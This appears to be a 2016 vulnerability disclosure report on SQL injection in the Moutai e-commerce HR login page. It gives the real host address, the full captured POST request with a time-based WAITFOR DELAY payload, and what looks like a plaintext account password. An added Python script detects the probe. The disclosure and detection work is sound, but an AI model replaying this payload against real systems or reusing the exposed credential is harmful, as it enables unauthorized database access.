2016-04-15: Details reported to the vendor, awaiting vendor handling
2016-04-15: Vendor confirmed; details visible to the vendor only
2016-04-25: Details disclosed to core white hats and relevant domain experts
2016-05-05: Details disclosed to regular white hats
2016-05-15: Details disclosed to intern white hats
2016-05-30: Details disclosed to the public
SQL injection vulnerability in the Moutai e-commerce human resources system
Affected URL: http://202.98.222.93:5000/rlzy/LoginTo.aspx
Injection parameter: UsersPanel_cbxUsers_VI
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgYCAQ8UKwAGDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQgUKwAEFgQeEkVuYWJsZUNhbGxiYWNrTW9kZWgeJ0VuYWJsZVN5bmNocm9uaXphdGlvbk9uUGVyZm9ybUNhbGxiYWNrIGhkDxYCHgpJc1NhdmVkQWxsZw8UKwATFCsAARYGHgRUZXh0BRXkurrlipvotYTmupDnpL7kv53pg6gfAAUCOTgeDlJ1bnRpbWVDcmVhdGVkZxQrAAEWBh8EBRXjgIDjgIDilJzilIDlip7lhazlrqQfAAUDMTgyHwVnFCsAARYGHwQFG+OAgOOAgOKUnOKUgOS6uuWKm+iwg+mFjeenkR8ABQMxNzUfBWcUKwABFgYfBAUV44CA44CA4pSc4pSA5bel6LWE56eRHwAFAzE3NB8FZxQrAAEWBh8EBRXjgIDjgIDilJzilIDmoaPmoYjlrqQfAAUDMTc2HwVnFCsAARYGHwQFFeOAgOOAgOKUnOKUgOiBjOensOWKnh8ABQMxNjYfBWcUKwABFgYfBAUV44CA44CA4pSc4pSA5Z+56K6t5YqeHwAFAzE2Nx8FZxQrAAEWBh8EBSHjgIDjgIDilJzilIDlirPliqjnuqrlvovnm5Hlr5/lrqQfAAUDMTc3HwVnFCsAARYGHwQFG+OAgOOAgOKUnOKUgOWKs+S/neeuoeeQhuWupB8ABQMxNzgfBWcUKwABFgYfBAUS44CA44CA4pSc4pSA56S+5L+dHwAFAzExNB8FZxQrAAEWBh8EBQ/nlJ/mtLvmnI3liqHpg6gfAAUCMzMfBWcUKwABFgYfBAUM6IKh5Lu96LSi5YqhHwAFAjIxHwVnFCsAARYGHwQFDOaciemZkOi0ouWKoR8ABQIzMR8FZxQrAAEWBh8EBQzplIDllK7lhazlj7gfAAUCMzYfBWcUKwABFgYfBAUM55Sf5Lqn6L2m6Ze0HwAFAzExNx8FZxQrAAEWBh8EBQznprvpgIDkvJHlip4fAAUDMTEyHwVnFCsAARYGHwQFDOS/oeaBr+S4reW/gx8ABQI3Nh8FZxQrAAEWBh8EBQzkuLTml7botKbmiLcfAAUDMTY0HwVnFCsAARYGHwQFDOW8gOWPkeWNleS9jR8ABQIyMx8FZ2RkZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABg8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB8BZx8CaGQPFgIfA2cPFCsABBQrAAEWBh8EBQblvpDlvLofAAUIMDAwMDA5NTEfBWcUKwABFgYfBAUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwVnFCsAARYGHwQFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwVnFCsAARYGHwQFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8FZ2RkZGRkAgUPPCsABgEADxYCHwAFD0lhbVN0cm9uZyEjQDk5OWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQtjYnhPcmdzJERERAUXVXNlcnNQYW5lbCRjYnhVc2VycyREREQFCGJ0bmxvZ2luBQdidG5FeGl0dsn/WEQw0XNmw8UZQyil4D0dK/7GdQ+cjN51ry+bqo8=&__EVENTVALIDATION=/wEWBALnj5KpAgLmpufNCAKJoNWhAwLH0qW1DtrELtcDaDHhGku5AaKCGWqUXDTMxG53jGq3kQT7P1Xi&cbxOrgs_VI=98&cbxOrgs=%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%A4%BE%E4%BF%9D%E9%83%A8&cbxOrgs_DDDWS=0:0:11998:0:0:0:-10000:-10000:1:0:0:0&cbxOrgs_DDD_LDeletedItems=&cbxOrgs
_DDD_LInsertedItems=&cbxOrgs_DDD_LCustomCallback=&cbxOrgs$DDD$L=98&UsersPanel_cbxUsers_VI=00000951\\\';WAITFOR DELAY \\\'0:0:10\\\'--&UsersPanel$cbxUsers=%E5%BE%90%E5%BC%BA&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:0:0:-10000:-10000:1:0:0:0&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel$cbxUsers$DDD$L=00000951&tbxPassword=IamStrong!#@999&btnlogin=CaterNoMatch&DXScript=1_157,1_89,1_149,1_108,1_115,1_107,1_86,1_141,1_139,1_110,1_88,1_100&DXCss=hr.ico,Globe.css,0_1501,1_9,1_4,0_1503,0_1631,0_1633,1_3,1_2
Proof of injection: stacked-query injection is present (time-based, via WAITFOR DELAY); the backend database is Microsoft SQL Server.
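As an added example that is not part of the original report, the following Python script decodes application/x-www-form-urlencoded POST bodies of the kind shown above and flags the stacked, time-based probe on UsersPanel_cbxUsers_VI for log review. The two sample bodies are constructed and shortened (the VIEWSTATE and password values are placeholders, not the page's capture), and the expectation that the two *_VI parameters hold purely numeric IDs is an assumption about the form, not something the report states.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl

# Detection heuristics for T-SQL stacked / time-based injection attempts,
# matched case-insensitively against each decoded form value.
TSQL_SIGNATURES = [
    (re.compile(r"'\s*;"), "quote followed by statement separator (stacked query)"),
    (re.compile(r"\bWAITFOR\s+DELAY\b", re.I), "WAITFOR DELAY time-based probe"),
    (re.compile(r"--\s*$"), "trailing comment truncating the query"),
]

# Allowlist of what selected parameters are expected to contain. The
# parameter names come from the captured request; the numeric-ID shape is
# an assumption about the login form, not taken from the report.
EXPECTED_SHAPE = {
    "UsersPanel_cbxUsers_VI": re.compile(r"^\d{1,12}$"),
    "cbxOrgs_VI": re.compile(r"^\d{1,12}$"),
}

# Constructed sample bodies modelled on the report's request (shortened;
# password and VIEWSTATE are placeholders).
BENIGN_BODY = (
    "__VIEWSTATE=PLACEHOLDER&cbxOrgs_VI=98&UsersPanel_cbxUsers_VI=00000951"
    "&tbxPassword=not-a-real-password&btnlogin=CaterNoMatch"
)
PROBE_BODY = (
    "__VIEWSTATE=PLACEHOLDER&cbxOrgs_VI=98"
    "&UsersPanel_cbxUsers_VI=00000951%27%3BWAITFOR%20DELAY%20%270%3A0%3A10%27--"
    "&tbxPassword=x&btnlogin=CaterNoMatch"
)


def scan_form_body(body: str) -> List[Tuple[str, str]]:
    """Decode a form-encoded body and return (parameter, reason) findings
    for every value that violates its expected shape or carries a T-SQL
    injection signature."""
    findings: List[Tuple[str, str]] = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        shape = EXPECTED_SHAPE.get(name)
        if shape is not None and not shape.match(value):
            findings.append((name, "value does not match expected numeric ID shape"))
        for pattern, reason in TSQL_SIGNATURES:
            if pattern.search(value):
                findings.append((name, reason))
    return findings


def is_suspicious(body: str) -> bool:
    """True when any parameter in the body produced a finding."""
    return bool(scan_form_body(body))


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("probe", PROBE_BODY)):
        print(label, "->", scan_form_body(body) or "clean")
```

The shape allowlist is the stronger of the two checks: an ID field that should only ever hold digits is flagged no matter which SQL dialect or keyword the payload uses, whereas the signature list only catches the specific T-SQL constructs seen in this report and will be noisy on free-text fields such as passwords. Neither replaces the real fix, which is to pass the value to SQL Server as a bound parameter rather than concatenating it into the query.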
# Filter
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-04-15 13:26
Thank you for your feedback; we will fix it as soon as possible.
None yet